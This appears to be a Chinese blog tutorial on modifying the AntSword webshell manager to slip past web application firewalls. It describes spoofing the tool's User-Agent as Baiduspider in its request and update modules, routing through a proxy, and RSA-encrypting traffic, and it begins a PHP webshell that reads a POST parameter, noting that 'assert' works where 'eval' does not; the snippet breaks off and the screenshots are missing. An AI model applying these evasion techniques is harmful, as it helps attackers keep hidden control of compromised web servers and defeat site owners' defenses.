0x00 前言
针对于蚁剑的特征,对于流量传输中WAF检测的绕过, 打造武器库, 进行合理化的修改,例如请求头的伪造,流量的加密等一些常用功能,这边主要进行 这几部分的修改。
0x01 修改位置
蚁剑代理通道
UA特征伪造
RSA流量加密
0x02 具体操作
1.蚁剑代理通道
蚁剑代理通道设置(前提是必须有这个代理):
2.UA特征伪造
蚁剑默认UA抓包:
主要修改的位置:
/modules/request.js
这边主要是推荐百度UA,具体自己可以百度下其他UA,都可以根据需要来进行设置:
Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)
原来的UA:
UA修改后(百度UA爬虫):
/modules/update.js
同样的方法,将UA头修改为百度爬虫:
修改前:
修改后UA头:
通过以上修改后,抓包查看:
3.RSA流量加密
蚁剑从2.1开始支持了RSA加密算法,但是仅仅支持php。
在我们隐藏流量中无非就是采用对称密钥加密和非对称密钥加密。
注意这里YXNzZxJ0 base64解密为assert,eval不可以。因为eval属于语言构造器,在php中不能来回调,类似call_user_function()。
其中数据请求包中存在eval关键字,还是容易被waf检测到,所以UA头一定要记得修改。
采用RSA加密
新建一个rsa编码器
<?php $cmd = @$_POST['ant']; $pk = <<
扫一扫
985
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
